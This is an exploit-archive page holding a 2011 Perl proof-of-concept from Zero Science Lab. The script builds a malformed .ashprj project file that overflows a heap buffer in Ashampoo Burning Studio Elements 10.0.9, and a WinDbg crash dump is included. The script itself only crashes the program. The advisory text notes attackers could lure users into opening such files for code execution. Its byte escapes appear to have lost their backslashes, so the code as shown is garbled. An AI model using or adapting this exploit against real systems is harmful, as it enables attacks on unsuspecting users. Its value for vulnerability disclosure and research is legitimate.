[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow
# Published : 2011-10-04
# Author :
# Previous Title : MS11-077 .fon Kernel-Mode Buffer Overrun PoC
# Next Title : Sunway ForceControl <= 6.1 sp3 Multiple Vulnerabilities


#!/usr/bin/perl
#
#
# Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability
#
#
# Vendor: Ashampoo GmbH & Co. KG
# Product web page: http://www.ashampoo.com
# Affected version: 10.0.9
#
# Summary: Ashampoo Burning Studio Elements offers you everything you need to
# burn movies, music and data - fast and effectively. The software with the
# intuitive user interface focuses on the core competencies of burning software
# and offers you compact functions to tackle all tasks relating to your burning
# projects ? easily create data discs, burn backups, rip music, create audio CDs
# or burn already existing film files on Blu-ray Disc and lots more.
#
# Desc: The application suffers from a heap overflow vulnerability because it
# fails to properly sanitize user supplied input when parsing .ashprj project
# file format resulting in a crash corrupting the heap-based memory. The
# attacker can use this scenario to lure unsuspecting users to open malicious
# crafted .ashprj files with a potential for arbitrary code execution on the
# affected system.
#
# ---------------------------------------------------------------------------
#
# HEAP[burningstudioelements.exe]: Heap block at 051F7F08 modified at 051F7F86 past requested size of 76
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f86 ecx=7c91d4fd edx=00f1eca5 esi=051f7f08 edi=00000076
# eip=7c90120e esp=00f1eea8 ebp=00f1eeac iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:000> g
# HEAP[burningstudioelements.exe]: Invalid Address specified to RtlFreeHeap( 01A70000, 051F7F10 )
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f08 ecx=7c91d4fd edx=00f1ecb6 esi=01a70000 edi=051f7f08
# eip=7c90120e esp=00f1eec0 ebp=00f1eec4 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:000> d edi
# 051f7f08  12 00 06 00 02 07 1a 01-01 00 00 00 e8 5c a0 e6  ...............
# 051f7f18  cb f9 c3 b3 0c e8 5c a0-e6 cb 41 42 41 42 41 42  .........ABABAB
# 051f7f28  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f38  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f48  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f58  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f68  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42  ABABABABABABABAB
# 051f7f78  41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 ab  ABABABABABABABA.
#
# ---------------------------------------------------------------------------
#
#
# Tested on: Microsoft Windows XP Pro SP3 (En)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2011-5050
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5050.php
#
#
# 28.09.2011
#


use strict;

system("color 80");

my $filefm = "Aodrulez.ashprj"; # ;)

&banner;
print "nThis PoC script will create the $filefm file!nn";
system("pause");

my $buffer = "x41x42" x 50000;

my $header = "x61x73x68x70x72x6Ax00x00x0Ax00x00x00x00x00x00x56". #0x03 (ETX) removed.
             "x45x52x53x08x00x00x00x00x00x00x00x02x00x00x00x01".
             "x00x00x00x66x50x52x4AxEAx02x00x00x00x00x00x00x49".
             "x44x00x00x20x00x00x00x00x00x00x00x70x00x72x00x6F".
             "x00x6Ax00x65x00x63x00x74x00x2Ex00x64x00x61x00x74".
             "x00x61x00x64x00x69x00x73x00x63x00x66x50x50x53x00".
             "x00x00x00x00x00x00x00x66x50x52x4Dx10x00x00x00x00".
             "x00x00x00x46x4Cx41x47x04x00x00x00x00x00x00x00x00".
             "x00x00x00x66x43x4Dx50x56x02x00x00x00x00x00x00x54".
             "x59x50x45x08x00x00x00x00x00x00x00x44x00x61x00x74".
             "x00x61x00x66x50x50x53x00x00x00x00x00x00x00x00x66".
             "x46x53x00x88x00x00x00x00x00x00x00x46x53x00x00x36".
             "x00x00x00x00x00x00x00x44x00x69x00x73x00x63x00x54".
             "x00x79x00x70x00x65x00x41x00x70x00x70x00x72x00x6F".
             "x00x70x00x72x00x69x00x61x00x74x00x65x00x2Ex00x50".
             "x00x72x00x69x00x6Dx00x61x00x72x00x79x00x46x53x00".
             "x00x3Ax00x00x00x00x00x00x00x44x00x69x00x73x00x63".
             "x00x54x00x79x00x70x00x65x00x41x00x70x00x70x00x72".
             "x00x6Fx00x70x00x72x00x69x00x61x00x74x00x65x00x2E".
             "x00x53x00x65x00x63x00x6Fx00x6Ex00x64x00x61x00x72".
             "x00x79x00x4Cx41x42x4Cx10x00x00x00x00x00x00x00x4D".
             "x00x79x00x20x00x46x00x69x00x6Cx00x65x00x73x00x66".
             "x4Bx49x44x7Ax01x00x00x00x00x00x00x66x46x44x52x6E".
             "x01x00x00x00x00x00x00x66x4Ex4Fx44xC7x00x00x00x00".
             "x00x00x00x48x45x41x44x1Fx00x00x00x00x00x00x00x00".
             "x00x00x00x80xEBx8Cx96x7Dx35xE1xB3x0Cx80xEBx8Cx96".
             "x7Dx35xE1xB3x0Cx80xEBx8Cx96x7Dx35xE1xB3x0Cx4Ex41".
             "x4Dx45x08x00x00x00x00x00x00x00x52x00x6Fx00x6Fx00".
             "x74x00x44x53x52x43x7Cx00x00x00x00x00x00x00x00x00".
             "x00x00x74x00x00x00x66x00x69x00x6Cx00x65x00x3Ax00".
             "x2Fx00x2Fx00x2Fx00x43x00x3Ax00x2Fx00x44x00x6Fx00".
             "x63x00x75x00x6Dx00x65x00x6Ex00x74x00x73x00x25x00".
             "x32x00x30x00x61x00x6Ex00x64x00x25x00x32x00x30x00".
             "x53x00x65x00x74x00x74x00x69x00x6Ex00x67x00x73x00".
             "x2Fx00x41x00x6Cx00x6Cx00x25x00x32x00x30x00x55x00".
             "x73x00x65x00x72x00x73x00x2Fx00x44x00x65x00x73x00".
             "x6Bx00x74x00x6Fx00x70x00x2Fx00x66x4Bx49x44x8Fx00".
             "x00x00x00x00x00x00x66x4Cx45x46x83x00x00x00x00x00".
             "x00x00x66x4Ex4Fx44x77x00x00x00x00x00x00x00x48x45".
             "x41x44x27x00x00x00x00x00x00x00x01x00x00x00xE8x5C".
             "xA0xE6xCBxF9xC3xB3x0CxE8x5CxA0xE6xCB";

my $footer = "xF9xC3xB3x0Cx28x80xBAxA7x70x35xE1xB3x0Cx50x02x00".
             "x00x00x00x00x00x4Ex41x4Dx45x12x00x00x00x00x00x00".
             "x00x4Ax00x6Fx00x78x00x79x00x31x00x2Ex00x6Cx00x6E".
             "x00x6Bx00x44x53x52x43x1Ax00x00x00x00x00x00x00x3A".
             "x00x00x00x12x00x00x00x4Ax00x6Fx00x78x00x79x00x31".
             "x00x2Ex00x6Cx00x6Ex00x6Bx00x66x43x4Dx50x28x00x00".
             "x00x00x00x00x00x54x59x50x45x10x00x00x00x00x00x00".
             "x00x45x00x6Cx00x54x00x6Fx00x72x00x69x00x74x00x6F".
             "x00x66x50x50x53x00x00x00x00x00x00x00x00";

my $fringe = $header.$buffer.$footer;

print "n - Preparing to write to file...n";
sleep 1;
open (prj, ">./$filefm") || die "nCan't open $filefm: $!";
print "n - Writing to file...n";
print prj $fringe;
close (prj);
sleep 2;
print "n - File "$filefm" successfully crafted!nn - t00t!n";

sub banner {

 print "n";
 print "_" x 51;
 print "nn Ashampoo Burning Studio Elements 10 Heap Overflownn";
 print "tCopyleft (c) 2011 - Zero Science Labnn";
 print "ttID: ZSL-2011-5050nn";
 print "_" x 51;
 print "n";

}

#EOF